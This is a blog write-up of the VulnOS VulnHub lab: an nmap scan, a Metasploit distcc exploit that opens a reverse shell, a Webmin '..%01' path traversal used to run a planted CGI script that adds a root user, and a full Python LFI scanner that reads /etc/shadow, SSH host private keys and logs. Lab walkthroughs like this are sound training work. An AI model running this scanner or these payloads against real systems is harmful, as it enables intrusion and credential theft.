Sunday 23 October 2016

VulnOS Solution

Hello Friends
This solution belongs to VulnOs VM from vulnhub. Hope you'll enjoy it.

So we start with basic nmap scan:-

22/tcp    open  ssh         OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.7.0-P1
80/tcp    open  http        Apache httpd 2.2.14 ((Ubuntu))
110/tcp   open  pop3        Dovecot pop3d
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd
389/tcp   open  ldap        OpenLDAP 2.2.X - 2.3.X
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
901/tcp   open  http        Samba SWAT administration server
993/tcp   open  ssl/imap    Dovecot imapd
995/tcp   open  ssl/pop3    Dovecot pop3d
2000/tcp  open  sieve       Dovecot timsieved
2049/tcp  open  nfs         2-4 (RPC #100003)
3306/tcp  open  mysql       MySQL 5.1.73-0ubuntu0.10.04.1
3632/tcp  open  distccd     distccd v1 ((Ubuntu 4.4.3-4ubuntu5.1) 4.4.3)
6667/tcp  open  irc         IRCnet ircd
8070/tcp  open  unknown
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
41120/tcp open  nlockmgr    1-4 (RPC #100021)
48389/tcp open  status      1 (RPC #100024)
59544/tcp open  mountd      1-3 (RPC #100005)
  After spending enough time around the services and trying to exploit them I got success in exploiting "distccd" service hosted on port 3632.

Searching the exploit for this service brings us to a meatsploit exploit- exploit/unix/misc/distcc_exec

Set up the RHOST IP address and fire up the exploit.

msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NsD30rklVB230mY4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NsD30rklVB230mY4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 5 opened (192.168.1.11:4444 -> 192.168.1.6:45453) at 2016-10-23 17:45:45 +0530

tty
not a tty

The terminal is not a tty so make it just for eye-candy sake:-

python -c 'import pty;pty.spawn("/bin/sh");'
$ tty
tty
/dev/pts/2

Dirbuster had given a handful amount of results, but that didn't feel necessary to be used except one hint (cgi-bin).



Browsing through the files in /var/www following applications are found hosted, pretty large number.

$ ls /var/www/
DVWA-1.0.8           imgs        mutillidae        redmine-0.9.6
Hackademic_Challenges[EN]  index.html    openclinic        tikiwiki-1.7.9
dolibarr-3.0.0           index2.html    phpsysinfo        webERP
egroupware           insecure    postfixadmin-2.3.1  webmin-1.280
There is webmin application, everyone is very fond of it ;)  So lets find what privileges does it hold?

$ ps aux | grep webmin
root      1892  0.0  0.9   6736  4676 ?        Ss   10:28   0:00 /usr/bin/perl /var/www/webmin-1.280
  Excellent, so now we know that webmin can be used for rooting purpose.

Lets browse through cgi-bin files.

$ cd /usr/lib/cgi-bin
$ ls
nagios3  php  php5
Lets check the permissions for cgi-bin


ls -l ../ | grep cgi-bin
drwxrwxrwx  3 root root       4096 Oct 23 11:05 cgi-bin
 777 permissions are a very rewarding permissions.

Now create a cgi script to add a root user-



So here we try to create a user "superb" with password "superbpass" as a super  user with this script. Just make sure that this script has executable permissions.
 Now all we need is run this script through root user. So, we search for webmin-1.280 exploits. Metasploit has exploit.

msf > search webmin

Matching Modules
================

   Name                                         Disclosure Date  Rank       Description
   ----                                         ---------------  ----       -----------
   auxiliary/admin/webmin/edit_html_fileaccess  2012-09-06       normal     Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
   auxiliary/admin/webmin/file_disclosure       2006-06-30       normal     Webmin File Disclosure
   exploit/unix/webapp/webmin_show_cgi_exec     2012-09-06       excellent  Webmin /file/show.cgi Remote Command Execution
But I didn't want to depend on metasploit once again. So I look through the exploit's code.

def run
    print_status("Attempting to retrieve #{datastore['RPATH']}...")

    dir = normalize_uri(datastore['DIR'])
    uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])



The variable "dir" has the value "unauthenticated" and exploit uses 40 in number directory traversals to get the file specified in "RPATH". So, lets check when does webmin break. I created a python script to check for LFI. BTW there is a perl exploit too for this.


 Well the "re" module didn't get used in the script.Here I iterate through a loop starting from 1 to 50 for directory traversal using "..%01/"
And guess what, webmin broke at 4th iteration. Hell


So, we can use this script to execute our cgi script.
Make necessary changes in webmin's file path. We need to run shell.cgi file located in /usr/lib/cgi-bin directory.


Now run the script.
 

Since I knew that script gets the job done in 4 iterations itself, so I didn't wait for more than that. Now time to check the passwd file.
 

Superb :)  so "superb" is now a new user. Lets switch to it.
 

Hahaha, Game Over buddy.
There are lot many other vulnerabilities too, like phpmyadmin (guessable password), DVWA etc... You can hit them one by one.

Hope you guys enjoyed the show ;)

EDIT: Below is the more modified LFI script which will try to read other possible important files too. If you know of any other important files that are not included here, plz post the names.

import urllib2,time
testers=['etc/passwd','etc/shadow','etc/issue','etc/profile','etc/services','/proc/version','proc/self/environ','var/log/apache2/access.log','var/log/apache/access.log','var/log/httpd/access','var/log/apache2/access_log','var/log/apache/access.log','var/log/apache/access_log','var/log/httpd/access_log','apache/logs/access','apache/logs/access_log','apache2/logs/access','apache2/logs/access_log','etc/httpd/logs/access_log','etc/httpd/logs/access','var/httpd/logs/access_log','var/httpd/logs/access.log','var/httpd/logs/access','var/www/logs/access_log','var/www/logs/access','usr/local/apache/logs/access_log','usr/local/apache/logs/access.log','usr/local/apache/logs/access','usr/local/apache2/logs/access_log','usr/local/apache2/logs/access.log','usr/local/apache2/logs/access','var/log/access_log','var/log/access','logs/access','logs/access_log','logs/access_log','opt/lampp/logs/access_log','opt/lampp/logs/access.log','opt/lampp/logs/access','opt/xampp/logs/access','opt/xampp/logs/access_log','opt/xampp/logs/access.log','var/log/dmesg','var/log/auth','var/log/auth.log','var/log/secure','etc/crontab','etc/cron*','etc/network/interfaces','etc/resolv.conf','etc/sysconfig/network','etc/networks','etc/sudoers','var/apache2/config.inc','var/lib/mysql/mysql/user.MYD','/root/anaconda-ks.cfg','var/mail/root','/var/spool/mail/root','etc/ssh/ssh_config','etc/ssh/sshd_config','etc/ssh/ssh_host_dsa_key.pub','etc/ssh/ssh_host_dsa_key','etc/ssh/ssh_host_rsa_key.pub','etc/ssh/ssh_host_rsa_key','etc/ssh/ssh_host_key.pub','etc/ssh/ssh_host_key','etc/fstab','etc/group','etc/sysconfig/network','etc/at.allow','etc/at.deny','etc/cron.allow','etc/cron.deny','etc/crontab','etc/anacrontab','var/spool/cron/crontabs/root','etc/syslog.conf','etc/chttp.conf','etc/lighttpd.conf','etc/cups/cupsd.conf','etc/inetd.conf','etc/apache2/apache2.conf','etc/my.conf','etc/httpd/conf/httpd.conf','opt/lampp/etc/httpd.conf','php://input']
address = "http://192.168.1.4/index1.php?help=true&connect="    # FOR THE LATEST APPLICATION I TESTED
#address = "http://192.168.1.3:10000/unauthenticated/"+"..%01/"*i+"etc/shadow"    #FOR WEBMIN
#address = "http://192.168.1.3:10000/unauthenticated/"+"..%01/"*i+"usr/lib/cgi-bin/shell.cgi" #FOR WEBMIN
def connect():
    for i in range(0,50,1):
        iterate = "../"*i
        if(i==0):
            iterate = "/"
        url=address+iterate+"etc/passwd"
        print "***** URL= ",url,"\n"
        print "[+][+] ",url
        try:
            res = urllib2.urlopen(url).read()
            if ("/bin/" in res):
                #if ("root" in res):
                #if (":" in res):
                print "\n[+][+] Passwd file found at ",i," iteration\n"
                raw_input("Press Enter...")
                print res
                choice=raw_input("\n[+][+] Do you want to look into other standard files? Press 'y'  ..")
                if(choice=='y' or choice=='Y'):
                    for item in testers:
                        url = address+ iterate + item
                        print url
                        res = urllib2.urlopen(url).read()
                        print res
                        raw_input("\n[+][+]Press enter...\n")
                else:
                    print "You didn't press 'y' or 'Y'. Exiting the script...GoodBye\n"
                    break
        except Exception, err:
            print "Exception occured, continuing.."
        time.sleep(0.5)
        print "[+][+] LOOP NUMBER- ",i
connect()

2 comments: